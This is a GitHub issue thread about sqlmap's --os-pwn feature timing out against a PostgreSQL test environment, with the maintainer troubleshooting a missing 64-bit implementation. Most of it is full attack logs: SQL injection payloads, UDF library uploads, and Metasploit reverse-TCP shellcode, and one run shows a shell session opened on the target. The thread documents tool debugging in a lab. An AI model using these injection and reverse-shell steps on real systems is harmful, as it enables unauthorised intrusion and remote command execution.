Open ljesparis opened 8 years ago
It didn't work. Not sure what's strange here?
On Sep 21, 2016 21:20, "Leonardo Esparis" notifications@github.com wrote:
hi,
when im trying to use metasploit with sqlmap, a timeout is raised, any suggestion?
[15:10:54] [INFO] testing connection to the target URL [15:10:54] [INFO] heuristics detected web page charset 'ascii' [15:10:55] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS [15:10:55] [WARNING] parsed DBMS error message: 'ERROR: syntax error at or near "(" LINE 1: SELECT * FROM users WHERE id=(1(.,),').,') OFFSET 0 LIMIT 1 ^' [15:10:55] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'PostgreSQL') [15:10:55] [WARNING] parsed DBMS error message: 'ERROR: syntax error at or near "'MYkyOC<'" LINE 1: SELECT * FROM users WHERE id=(1'MYkyOC<'">bxcrbJ) OFFSET 0 L... ^' [15:10:55] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting attacks [15:10:55] [INFO] testing for SQL injection on GET parameter 'id' it looks like the back-end DBMS is 'PostgreSQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] for the remaining tests, do you want to include all tests for 'PostgreSQL' extending provided level (1) and risk (1) values? [Y/n] [15:10:56] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' [15:10:56] [WARNING] time-based comparison requires larger statistical model, please wait............................ (done)
[15:11:07] [INFO] GET parameter 'id' appears to be 'PostgreSQL > 8.1 stacked queries (comment)' injectable [15:11:07] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [15:11:07] [INFO] checking if the injection point on GET parameter 'id' is a false positive [15:11:17] [WARNING] parsed DBMS error message: 'ERROR: syntax error at or near "20" LINE 1: ...T * FROM users WHERE id=(1);SELECT (CASE WHEN (80 20) THEN (... ^' GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection point(s) with a total of 38 HTTP(s) requests:
Parameter: id (GET) Type: stacked queries Title: PostgreSQL > 8.1 stacked queries (comment) Payload: id=1);SELECT PG_SLEEP(5)--
[15:11:37] [INFO] the back-end DBMS is PostgreSQL web server operating system: Linux Debian 7.0 (wheezy) web application technology: PHP 5.4.45, Apache 2.2.22 back-end DBMS: PostgreSQL [15:11:37] [INFO] fingerprinting the back-end DBMS operating system [15:11:37] [WARNING] parsed DBMS error message: 'ERROR: table "sqlmapfile" does not exist' [15:11:37] [WARNING] it is very important to not stress the network adapter during usage of time-based payloads to prevent potential disruptions [15:11:37] [INFO] the back-end DBMS operating system is Linux [15:11:37] [WARNING] parsed DBMS error message: 'ERROR: table "sqlmapfilehex" does not exist' [15:11:37] [INFO] testing if current user is DBA [15:11:42] [INFO] detecting back-end DBMS version from its banner [15:11:42] [INFO] retrieved: 9.1.23 what is the back-end database management system architecture? [1] 32-bit (default) [2] 64-bit 1 [15:13:33] [INFO] checking if UDF 'sys_bineval' already exist [15:13:33] WARNING http://case time-based comparison requires larger statistical model, please wait.............................. (done)
UDF 'sys_bineval' already exists, do you want to overwrite it? [y/N] [15:13:46] [INFO] checking if UDF 'sys_exec' already exist UDF 'sys_exec' already exists, do you want to overwrite it? [y/N] how do you want to execute the Metasploit shellcode on the back-end database underlying operating system? [1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default) [2] Via shellcodeexec (file system way, preferred on 64-bit systems)
[15:13:57] [INFO] creating Metasploit Framework multi-stage shellcode which connection type do you want to use? [1] Reverse TCP: Connect back from the database host to this machine (default) [2] Bind TCP: Listen on the database host for a connection
what is the local address? [Enter for '192.168.2.10' (detected)] which local port number do you want to use? [38748] which payload do you want to use? [1] Shell (default) [2] Meterpreter (beta)
[15:14:02] [INFO] creation in progress .......... done [15:14:12] [INFO] running Metasploit Framework command line interface locally, please wait.. ######## # ################# # ###################### # ######################### # ############################ ############################## ############################### ############################### ##############################
####################### #### #################### #### ################## #### ############ ## ######## ### ######### ##### ############ ###### ######## #########
#######################
########################
=[ metasploit v4.12.25-dev ]
- -- --=[ 1577 exploits - 901 auxiliary - 272 post ]
- -- --=[ 455 payloads - 39 encoders - 8 nops ]
- -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
PAYLOAD => linux/x86/shell/reversetcp EXITFUNC => thread LPORT => 38748 LHOST => 192.168.2.10 [ ] Started reverse TCP handler on 192.168.2.10:38748 http://192.168.2.10:38748 [_] Starting the payload handler... [15:14:37] [INFO] running Metasploit Framework shellcode remotely via UDF 'sys_bineval', please wait.. [15:19:13] [CRITICAL] timeout occurred while attempting to open a remote session
D=
— You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub https://github.com/sqlmapproject/sqlmap/issues/2173, or mute the thread https://github.com/notifications/unsubscribe-auth/AA4P0x2XLuL59oqhtS3afgEg48lKPSFEks5qsYNagaJpZM4KDLbJ .
why did not work? i mean, im learning about sqlmap and i want to know when it will work? im using sqlmaproject testenv..
Are you sure that it is 32-bit environment? Also, please make a quick test on that same listening machine whether it is possible to connect to some arbitrary port in the first place. Google for netcat server/client
Bye
On Sep 21, 2016 21:25, "Leonardo Esparis" notifications@github.com wrote:
why did not work? i mean, im learning about sqlmap and i want to know when i will work? im using sqlmaproject testenv..
— You are receiving this because you commented. Reply to this email directly, view it on GitHub https://github.com/sqlmapproject/sqlmap/issues/2173#issuecomment-248716214, or mute the thread https://github.com/notifications/unsubscribe-auth/AA4P0-a1AR1s7e4ub38nq8-gmveBKTdPks5qsYSUgaJpZM4KDLbJ .
both computer can communicate with netcat and the problem persist
# python sqlmap.py -u "http://debiandev/sqlmap/pgsql/get_brackets.php?id=1" --technique=S --os-pwn --batch
_
___ ___| |_____ ___ ___ {1.0.9.24#dev}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 12:52:19
[12:52:19] [WARNING] you did not provide the local path where Metasploit Framework is installed
[12:52:19] [WARNING] sqlmap is going to look for Metasploit Framework installation inside the environment path(s)
[12:52:19] [INFO] Metasploit Framework has been found installed in the '/usr/bin' path
[12:52:19] [INFO] resuming back-end DBMS 'postgresql'
[12:52:19] [INFO] testing connection to the target URL
[12:52:19] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: id=1);SELECT PG_SLEEP(5)--
---
[12:52:19] [INFO] the back-end DBMS is PostgreSQL
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: PostgreSQL
[12:52:19] [INFO] fingerprinting the back-end DBMS operating system
[12:52:19] [INFO] the back-end DBMS operating system is Linux
[12:52:19] [INFO] testing if current user is DBA
[12:52:19] [INFO] detecting back-end DBMS version from its banner
[12:52:19] [INFO] resumed: 8.3.9
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
> 1
[12:52:19] [INFO] checking if UDF 'sys_bineval' already exist
[12:52:19] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
UDF 'sys_bineval' already exists, do you want to overwrite it? [y/N] N
[12:52:24] [INFO] checking if UDF 'sys_exec' already exist
[12:52:24] [WARNING] it is very important to not stress the network adapter during usage of time-based payloads to prevent potential disruptions
UDF 'sys_exec' already exists, do you want to overwrite it? [y/N] N
how do you want to execute the Metasploit shellcode on the back-end database underlying operating system?
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
[2] Via shellcodeexec (file system way, preferred on 64-bit systems)
> 1
[12:52:29] [INFO] creating Metasploit Framework multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Bind TCP: Listen on the database host for a connection
> 1
what is the local address? [Enter for '192.168.146.1' (detected)] 192.168.146.1
which local port number do you want to use? [7122] 7122
which payload do you want to use?
[1] Shell (default)
[2] Meterpreter (beta)
> 1
[12:52:29] [INFO] creation in progress ..... done
[12:52:34] [INFO] running Metasploit Framework command line interface locally, please wait..
_---------.
.' ####### ;."
.---,. ;@ @@`; .---,..
." @@@@@'.,'@@ @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
`.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
"--'.@@@ -.@ @ ,'- .'--"
".@' ; @ @ `. ;'
|@@@@ @@@ @ .
' @@@ @@ @@ ,
`.@@@@ @@ .
',@@ @ ; _____________
( 3 C ) /|___ / Metasploit! \
;@'. __*__,." \|--- \_____________/
'(.,...."/
=[ metasploit v4.11.8-dev-a030179 ]
+ -- --=[ 1518 exploits - 877 auxiliary - 259 post ]
+ -- --=[ 437 payloads - 38 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
PAYLOAD => linux/x86/shell/reverse_tcp
EXITFUNC => thread
LPORT => 7122
LHOST => 192.168.146.1
[*] Started reverse TCP handler on 192.168.146.1:7122
[*] Starting the payload handler...
[12:52:40] [INFO] running Metasploit Framework shellcode remotely via UDF 'sys_bineval', please wait..
[12:52:40] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[*] Sending stage (36 bytes) to 192.168.146.130
[*] Command shell session 1 opened (192.168.146.1:7122 -> 192.168.146.130:14030) at 2016-09-23 12:52:40 +0200
pwd
/var/lib/postgresql/8.3/main
whoami
postgres
Can you please check the /tmp
folder in the target machine itself whether there are any new files after you run the --os-pwn
, like e.g.:
debian-5:/tmp# ll
total 212
-rw-rw---- 1 informix informix 1749 Jun 1 11:47 blduser.out.2130
-rw-rw---- 1 informix informix 6365 Jun 1 11:46 bldutil.2130
-rw-rw---- 1 informix informix 184475 Jun 1 11:45 buildsmi.2130
-rw-rw---- 1 informix informix 137 Jun 1 11:22 buildsmi.2130.drop
-rw-r--r-- 1 postgres postgres 5124 Jun 3 10:26 libsrfxw.so
Please pull the latest revision and retry. There is a possibility that it will work :). Reduced the size(s) of uploaded .so libraries - size constraints regarding file upload size is the standard issue on PostgreSQL SQLi
mm nope, did not work either D= and im using 64 bits architecture on victim machine.. but victim has postgresql 9.5..
victim machine /tmp folder, 64 bit architecture is supported?
drwxrwxrwt 7 root root 4096 sep 23 13:51 24 00:17 ./
drwxr-xr-x 24 root root 4096 sep 23 13:51 22 14:30 ../
-rw-r--r-- 1 postgres postgres 6152 sep 23 13:51 23 23:58 libshchw.so
-rwxr--r-- 1 postgres postgres 3516 sep 23 13:51 24 00:07 tmpseuiih*
_
___ ___| |_____ ___ ___ {1.0.9.32#dev}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 17:13:41
[17:13:41] [INFO] resuming back-end DBMS 'postgresql'
[17:13:41] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1) AND 7969=7969 AND (4138=4138
Type: error-based
Title: PostgreSQL AND error-based - WHERE or HAVING clause
Payload: id=1) AND 8237=CAST((CHR(113)||CHR(112)||CHR(122)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (8237=8237) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(98)||CHR(120)||CHR(113)) AS NUMERIC) AND (9870=9870
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: id=1);SELECT PG_SLEEP(5)--
Type: AND/OR time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: id=1) AND 1926=(SELECT 1926 FROM PG_SLEEP(5)) AND (5118=5118
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=1) UNION ALL SELECT NULL,NULL,(CHR(113)||CHR(112)||CHR(122)||CHR(107)||CHR(113))||(CHR(69)||CHR(113)||CHR(84)||CHR(111)||CHR(89)||CHR(84)||CHR(74)||CHR(121)||CHR(88)||CHR(99)||CHR(88)||CHR(75)||CHR(82)||CHR(111)||CHR(106)||CHR(84)||CHR(70)||CHR(89)||CHR(122)||CHR(112)||CHR(89)||CHR(109)||CHR(106)||CHR(88)||CHR(69)||CHR(86)||CHR(87)||CHR(68)||CHR(122)||CHR(104)||CHR(121)||CHR(106)||CHR(114)||CHR(80)||CHR(78)||CHR(113)||CHR(100)||CHR(99)||CHR(104)||CHR(85))||(CHR(113)||CHR(112)||CHR(98)||CHR(120)||CHR(113))-- VXgp
---
[17:13:41] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: PostgreSQL
[17:13:41] [INFO] fingerprinting the back-end DBMS operating system
[17:13:41] [INFO] the back-end DBMS operating system is Linux
[17:13:41] [INFO] testing if current user is DBA
[17:13:41] [INFO] detecting back-end DBMS version from its banner
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
> 1
[17:13:42] [INFO] checking if UDF 'sys_bineval' already exist
UDF 'sys_bineval' already exists, do you want to overwrite it? [y/N]
[17:13:48] [INFO] checking if UDF 'sys_exec' already exist
UDF 'sys_exec' already exists, do you want to overwrite it? [y/N]
how do you want to execute the Metasploit shellcode on the back-end database underlying operating system?
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
[2] Via shellcodeexec (file system way, preferred on 64-bit systems)
> 1
[17:13:52] [INFO] creating Metasploit Framework multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Bind TCP: Listen on the database host for a connection
> 1
what is the local address? [Enter for '192.168.2.10' (detected)]
which local port number do you want to use? [22816]
which payload do you want to use?
[1] Shell (default)
[2] Meterpreter (beta)
> 1
[17:14:09] [INFO] creation in progress ........... done
[17:14:20] [INFO] running Metasploit Framework command line interface locally, please wait..
+-------------------------------------------------------+
| METASPLOIT by Rapid7 |
+---------------------------+---------------------------+
| __________________ | |
| ==c(______(o(______(_() | |""""""""""""|======[*** |
| )=\ | | EXPLOIT \ |
| // \\ | |_____________\_______ |
| // \\ | |==[msf >]============\ |
| // \\ | |______________________\ |
| // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ |
| // \\ | ********************* |
+---------------------------+---------------------------+
| o O o | \'\/\/\/'/ |
| o O | )======( |
| o | .' LOOT '. |
| |^^^^^^^^^^^^^^|l___ | / _||__ \ |
| | PAYLOAD |""\___, | / (_||_ \ |
| |________________|__|)__| | | __||_) | |
| |(@)(@)"""**|(@)(@)**|(@) | " || " |
| = = = = = = = = = = = = | '--------------' |
+---------------------------+---------------------------+
=[ metasploit v4.12.25-dev ]
+ -- --=[ 1577 exploits - 901 auxiliary - 272 post ]
+ -- --=[ 455 payloads - 39 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
PAYLOAD => linux/x86/shell/reverse_tcp
EXITFUNC => thread
LPORT => 22816
LHOST => 192.168.2.10
[*] Started reverse TCP handler on 192.168.2.10:22816
[*] Starting the payload handler...
[17:14:46] [INFO] running Metasploit Framework shellcode remotely via UDF 'sys_bineval', please wait..
[17:14:47] [WARNING] time-based comparison requires larger statistical model, please wait............................ (done)
[17:19:21] [CRITICAL] timeout occurred while attempting to open a remote session
Just downloaded one TurnKey 64-bit machine with PostgreSQL and it seems that you are right. I'll need to fix the support for --os-pwn
against 64-bit PostgreSQL. Please give me some time as I'll be away for the weekend.
p.s. sqlmap's upload of those .so
files is working perfectly (related UDF functions are working even when calling them manually)
okay .. =P
Just a quick update. Situation seems to be more complicated than I thought. As Bernardo originally implemented that part it seems that support for 64-bit version has never been done in the first place. For example shellcodeexec
perfectly works in 32-bit environment because of things like Metasploit's x86/alpha_mixed
which gives you a alphanumeric payload (perfect for placing it into the shellcodeexec
's argument) to be used in 32-bit case, but there is no similar encoder for x64
. Also, if using the 32-bit version of shellcodeexec in the 64-bit environment, 32-bit OS libraries have to be preinstalled (e.g. ia32-libs
) by the administrator himself. Anyway, give me some time
hi,
when im trying to use metasploit with sqlmap, a timeout is raised, any suggestion? $ ./sqlmap -u "http://192.168.2.10/testenv/pgsql/get_brackets.php?id=1" --os-pwn --msf-path /path/to/metasploit [15:10:54] [INFO] testing connection to the target URL [15:10:54] [INFO] heuristics detected web page charset 'ascii' [15:10:55] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS [15:10:55] [WARNING] parsed DBMS error message: 'ERROR: syntax error at or near "(" LINE 1: SELECT * FROM users WHERE id=(1(.,),').,') OFFSET 0 LIMIT 1 ^' [15:10:55] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'PostgreSQL') [15:10:55] [WARNING] parsed DBMS error message: 'ERROR: syntax error at or near "'MYkyOC<'" LINE 1: SELECT * FROM users WHERE id=(1'MYkyOC<'">bxcrbJ) OFFSET 0 L... ^' [15:10:55] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting attacks [15:10:55] [INFO] testing for SQL injection on GET parameter 'id' it looks like the back-end DBMS is 'PostgreSQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] for the remaining tests, do you want to include all tests for 'PostgreSQL' extending provided level (1) and risk (1) values? [Y/n] [15:10:56] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' [15:10:56] [WARNING] time-based comparison requires larger statistical model, please wait............................ (done)
[15:11:07] [INFO] GET parameter 'id' appears to be 'PostgreSQL > 8.1 stacked queries (comment)' injectable [15:11:07] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [15:11:07] [INFO] checking if the injection point on GET parameter 'id' is a false positive [15:11:17] [WARNING] parsed DBMS error message: 'ERROR: syntax error at or near "20" LINE 1: ...T * FROM users WHERE id=(1);SELECT (CASE WHEN (80 20) THEN (... ^' GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 38 HTTP(s) requests:
Parameter: id (GET) Type: stacked queries Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: id=1);SELECT PG_SLEEP(5)--
[15:11:37] [INFO] the back-end DBMS is PostgreSQL web server operating system: Linux Debian 7.0 (wheezy) web application technology: PHP 5.4.45, Apache 2.2.22 back-end DBMS: PostgreSQL [15:11:37] [INFO] fingerprinting the back-end DBMS operating system [15:11:37] [WARNING] parsed DBMS error message: 'ERROR: table "sqlmapfile" does not exist' [15:11:37] [WARNING] it is very important to not stress the network adapter during usage of time-based payloads to prevent potential disruptions [15:11:37] [INFO] the back-end DBMS operating system is Linux [15:11:37] [WARNING] parsed DBMS error message: 'ERROR: table "sqlmapfilehex" does not exist' [15:11:37] [INFO] testing if current user is DBA [15:11:42] [INFO] detecting back-end DBMS version from its banner [15:11:42] [INFO] retrieved: 9.1.23 what is the back-end database management system architecture? [1] 32-bit (default) [2] 64-bit 1 [15:13:33] [INFO] checking if UDF 'sys_bineval' already exist [15:13:33] WARNING time-based comparison requires larger statistical model, please wait.............................. (done)
UDF 'sys_bineval' already exists, do you want to overwrite it? [y/N] [15:13:46] [INFO] checking if UDF 'sys_exec' already exist UDF 'sys_exec' already exists, do you want to overwrite it? [y/N] how do you want to execute the Metasploit shellcode on the back-end database underlying operating system? [1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default) [2] Via shellcodeexec (file system way, preferred on 64-bit systems)
PAYLOAD => linux/x86/shell/reversetcp EXITFUNC => thread LPORT => 38748 LHOST => 192.168.2.10 [] Started reverse TCP handler on 192.168.2.10:38748 [_] Starting the payload handler... [15:14:37] [INFO] running Metasploit Framework shellcode remotely via UDF 'sys_bineval', please wait.. [15:19:13] [CRITICAL] timeout occurred while attempting to open a remote session
D=